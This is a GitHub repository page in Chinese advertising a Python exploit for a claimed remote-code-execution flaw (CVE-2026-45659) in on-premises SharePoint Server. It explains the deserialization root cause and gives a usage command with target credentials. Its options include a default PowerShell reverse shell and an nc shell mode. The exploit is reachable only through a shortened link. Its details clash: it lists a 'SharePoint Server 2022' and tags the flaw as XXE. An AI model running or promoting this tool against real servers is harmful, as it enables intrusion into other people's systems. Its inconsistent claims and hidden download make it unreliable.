mistbarbarianspot/CVE-2026-45659-SharePoint-RCE
GitHub: mistbarbarianspot/CVE-2026-45659-SharePoint-RCE
针对 Microsoft SharePoint Server 不安全反序列化 RCE 漏洞(CVE-2026-45659)的 Python 利用工具,仅需低权限凭据即可实现远程代码执行。
Stars: 0 | Forks: 0
## CVE-2026-45659 SharePoint 反序列化 RCE
### 概述
针对 CVE-2026-45659 的漏洞利用,影响 Microsoft SharePoint Server 2019/2022/Subscription Edition (本地部署)。
经过身份验证的低权限用户(Site Member 或同等权限)可以通过 `SPListItem` 处理路径中的不安全反序列化实现远程代码执行。
已在 2026 年 5 月更新之前的完全修补环境中进行测试。通过 HTTPS 工作,初始身份验证后无需任何交互。
### 根本原因
`Microsoft.SharePoint.Library` 中的易受攻击代码路径在处理具有特定 ViewState 样式序列化的自定义字段类型时,对通过列表项的 `Update()` 方法传递的攻击者可控数据使用了 `LosFormatter.Deserialize`。没有适当的类型过滤或 ObjectStateFormatter 限制。具有 Contribute 权限的低权限用户可以通过标准的 REST/ CSOM 调用触发。
### 用法
```
python3 cve-2026-45659.py -t https://sharepoint.target.com -u user@target.com -p Password123 -s "SiteName/ListName" -c "whoami /all"
```
**必需条件:**
- 有效的低权限凭据 (Site Member)
- 至少包含一个可编辑项的目标列表
**选项:**
- `-c` - 要执行的命令(默认:powershell reverse shell)
- `--shell` - 交互式 reverse shell 模式(使用 nc)
- `--proxy` - HTTP 代理支持
- `--quiet` - 最少输出
在修补前的最新 CU 的 Windows Server 2019/2022 上保持稳定。
### 漏洞利用
[链接](https://tinyurl.com/mphms4uy)
### 免责声明
本仓库仅出于教育和授权的红队演练/渗透测试目的提供。
该漏洞利用仅旨在用于您拥有或获得明确书面测试许可的系统。未经授权的使用可能违反法律。
使用风险自负。
标签:Microsoft SharePoint, XXE攻击, 反序列化漏洞, 威胁模拟, 编程工具, 远程代码执行, 逆向工具